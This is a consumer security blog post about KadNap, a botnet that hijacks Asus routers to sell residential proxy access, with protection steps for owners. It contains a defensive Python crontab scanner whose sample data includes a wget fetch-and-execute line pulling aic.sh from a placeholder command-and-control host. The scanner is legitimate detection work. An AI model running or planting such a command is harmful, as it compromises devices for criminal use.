Your internet feels a little slow today. Maybe it’s just traffic, right? Wrong. It could be cybercriminals silently using your router to commit crimes — and you’d never know.
The Threat No One Is Talking About (Until Now)
A silent digital predator is prowling home networks across America — and most victims don’t even know they’ve been targeted.
It’s called Kadnap malware, and it’s not just another virus. This is a sophisticated, next-generation router hijack operation that turns your innocent home device into a weapon for global cybercrime.
Discovered by the Black Lotus Labs team at Lumen Technologies, KadNap primarily targets Asus routers, conscripting them into a botnet that proxies malicious traffic. And it’s been growing in the shadows since August 2025.
The Numbers Are Shocking — Here’s What We Know
Before diving into how it works, let’s talk scale. Because the Kadnap malware router hijack isn’t a small, isolated incident:
- 14,000+ devices have already been infected, with more than 60% of victims located in the United States.
- The daily count of compromised devices jumped from roughly 10,000 in August 2025 to over 14,000 today.
- Infections have also been detected in Taiwan, Hong Kong, Russia, the UK, Australia, Brazil, France, Italy, and Spain.
- The proxy service linked to KadNap — called Doppelgänger — claims to offer residential proxies in over 50 countries.
This isn’t a niche cybersecurity story. This is happening in living rooms, home offices, and small businesses right now.
So… What Exactly Is Kadnap Malware?
Think of your router as the front door of your house. Kadnap malware doesn’t kick the door down — it quietly makes a copy of your key, lets itself in whenever it wants, and rents your house out to criminals while you’re asleep.
Once a device is infected, it is silently enrolled into a peer-to-peer network and used as a proxy for routing malicious traffic — completely without the owner’s knowledge.
The name itself tells the story: KadNap gets its name from its use of a customized version of the Kademlia Distributed Hash Table (DHT) protocol — the same decentralized architecture used by some file-sharing networks.
In plain English? It hides in plain sight, disguised as normal internet traffic.
How Does the Kadnap Malware Router Hijack Actually Work?
This is where it gets technically fascinating — and terrifying.
Step 1: The Initial Infection
A KadNap infection begins with the download of a malicious shell script called aic.sh from a command-and-control server; the script then establishes persistence via a cron job that runs every 55 minutes.
Step 2: Deep Embedding
The file creates a cron job that retrieves the shell script, renames it to .asusrouter, and runs it — a naming choice clearly designed to blend in with legitimate router processes.
Step 3: The Peer-to-Peer Network
KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which conceals the IP address of the attackers’ infrastructure within a peer-to-peer system to evade traditional network monitoring.
This is the genius — and the menace — of this attack. Traditional malware uses central servers that can be identified and shut down. KadNap doesn’t.
Step 4: Sold to the Highest Bidder
Compromised routers power a paid proxy service called Doppelganger, which routes customers’ internet traffic through the residential connections of people who have no idea it’s happening.
These services are typically used to launch distributed denial-of-service (DDoS) attacks, credential stuffing, and brute-force attacks.
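As an added, defender-side example (not from the article or from Black Lotus Labs), the check below scans crontab entries for the persistence pattern described in Steps 1 and 2: a job on a 55-minute schedule that fetches aic.sh and runs it under the name .asusrouter. The sample crontab and the C2 host are constructed, and expressing the schedule as `*/55` is an assumption about how such a job would be written.

```python
import re

# Indicators taken from the write-up above: a cron job firing every 55 minutes
# that fetches the aic.sh script and runs it under the name .asusrouter.
SUSPICIOUS_NAMES = (".asusrouter", "aic.sh")
FETCH_TOOLS = ("wget", "curl")

def inspect_crontab_line(line):
    """Return the indicators a single crontab entry matches (empty list if none)."""
    parts = line.strip().split(None, 5)
    if len(parts) < 6:            # not a five-field schedule plus a command
        return []
    minute, command = parts[0], parts[5]
    reasons = []
    m = re.fullmatch(r"\*/(\d+)", minute)   # '*/55' form is an assumption
    if m and int(m.group(1)) == 55:
        reasons.append("55-minute schedule")
    for name in SUSPICIOUS_NAMES:
        if name in command:
            reasons.append(f"references {name}")
    # download tool in the same command as a shell invocation or a .sh file
    if any(tool in command for tool in FETCH_TOOLS) and re.search(r"\bsh\b", command):
        reasons.append("downloads and executes a shell script")
    return reasons

def find_suspicious_entries(crontab_text):
    """Return (entry, reasons) for every non-comment line that trips an indicator."""
    hits = []
    for line in crontab_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        reasons = inspect_crontab_line(line)
        if reasons:
            hits.append((line.strip(), reasons))
    return hits

# Constructed sample crontab: two benign jobs plus one modelled on the described
# persistence job. The C2 host is a placeholder, not a real indicator.
SAMPLE_CRONTAB = """\
# constructed sample, not copied from an infected device
0 3 * * * /sbin/logrotate
*/5 * * * * /usr/sbin/ntpclient -s
*/55 * * * * wget -q -O /tmp/.asusrouter http://C2-PLACEHOLDER/aic.sh && sh /tmp/.asusrouter
"""

if __name__ == "__main__":
    for entry, reasons in find_suspicious_entries(SAMPLE_CRONTAB):
        print(entry, "->", ", ".join(reasons))
```

On a real device the same function can be fed the output of `crontab -l` or the contents of the cron spool files; the published IoC list remains the authoritative check.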
Why Is This Botnet So Hard to Remove?
Most botnets have a weakness: their central command server. Find it, shut it down, and the botnet collapses. Kadnap malware was engineered to eliminate that weakness entirely.
Its decentralized design means there is no central server that could be easily shut down by law enforcement, making the KadNap botnet incredibly resilient to attempts to dismantle it.
Here’s what makes it uniquely dangerous:
- No central point of failure — the network is distributed across all infected devices
- Encrypted communications — KadNap establishes AES-protected channels for encrypted command traffic.
- Invisible to the victim — for the average owner of an infected Asus router, the malware would be undetectable beyond internet speeds feeling slightly sluggish at times.
- Bypasses security filters — using traffic from household routers means attackers can bypass conventional security filters, as the traffic looks like it is coming from an ordinary person browsing the web.
Wait — Does a Simple Reboot Fix It?
If you’re thinking “I’ll just restart my router,” we have bad news.
KadNap stores a shell script that automatically re-executes when a compromised router restarts, so powering the device off and on again changes nothing.
A reboot won’t save you. This infection has roots.
Who Is Behind This? The Doppelganger Connection
The criminal ecosystem powering Kadnap malware router hijack is more organized than most people realize.
The KadNap botnet is linked to the Doppelganger proxy service, believed to be a rebrand of the Faceless service previously associated with the TheMoon malware botnet — which also targeted Asus routers.
The Doppelganger service appears to have launched in May or June 2025, and the KadNap malware that feeds it was first detected in the wild in August 2025.
This is an organized cybercrime operation — not a lone hacker in a basement. These are professional criminals running what amounts to a criminal proxy marketplace.
Am I at Risk? Signs Your Router May Be Compromised
Ask yourself these questions:
- Are you running an Asus router with older firmware?
- Have you never changed your router’s default admin password?
- Is your router’s management interface exposed to the internet?
- Have you noticed your internet speeds becoming mysteriously slower?
- Has your internet bill spiked with unexplained data usage?
If you answered yes to even one of these, your device could be at elevated risk of a Kadnap malware router hijack.
How to Protect Yourself: 6 Steps to Secure Your Router Right Now
The good news? Security experts have outlined a clear protection roadmap. Here’s what they recommend:
- Update your firmware immediately — regularly check for and install the latest security patches to close known vulnerabilities.
- Do a full factory reset (not just a reboot) — if you suspect infection, only a complete reset removes the malware.
- Change your default admin password — make it long, unique, and complex.
- Disable remote management — ensure the router’s administrative login page is not exposed to the public internet and disable remote management features when not actively required.
- Replace end-of-life devices — users are advised to replace models that are end-of-life and no longer supported.
- Check the IoC list — anyone worried about their router should check Black Lotus Labs’ published list of IP addresses and file hashes found in infected device logs.
What’s the Wider Cybersecurity Industry Doing?
The response from the security community has been swift — but the threat remains active.
Lumen has proactively blocked all network traffic to or from the KadNap control infrastructure and will begin distributing indicators of compromise (IoCs) into public feeds to enable others to help disrupt this threat.
Researchers concluded: “Their intention is clear — avoid detection and make it difficult for defenders to protect against. Every IP address associated with this botnet represents a significant, persistent risk to organizations and individuals alike.”
The battle is ongoing. And your router is on the front line.
The Bottom Line: Your Router Is Not Just a Router Anymore
The Kadnap malware router hijack is a wake-up call for every household and small business that has ever thought “who would bother hacking my router?”
The answer: criminals who don’t care about you specifically. They care about your IP address, your bandwidth, and your clean internet reputation — all of which they can sell.
Threat actors are building large-scale botnets specifically designed to hijack devices, using them to route traffic and evade detection by network security systems. Your router is the perfect disguise for their crimes.
Don’t let your home network become a criminal’s getaway car.
Take Action Right Now — Before It’s Too Late
Your router security cannot wait until tomorrow. Here’s your immediate action plan:
1. Log into your router admin panel today and check for firmware updates.
2. Change your admin password to something strong and unique.
3. Disable remote management unless you absolutely need it.
4. Visit Black Lotus Labs to check the latest IoCs and see if your IP appears on the compromised list.
5. If your router is end-of-life — replace it. Today.
Share this post with every friend, family member, or colleague who owns a home router. They deserve to know their network could already be hijacked.
The cybercriminals behind Kadnap malware are counting on your inaction. Don’t give it to them.
Sources: Lumen Black Lotus Labs, The Hacker News, BleepingComputer, Security Affairs — March 2026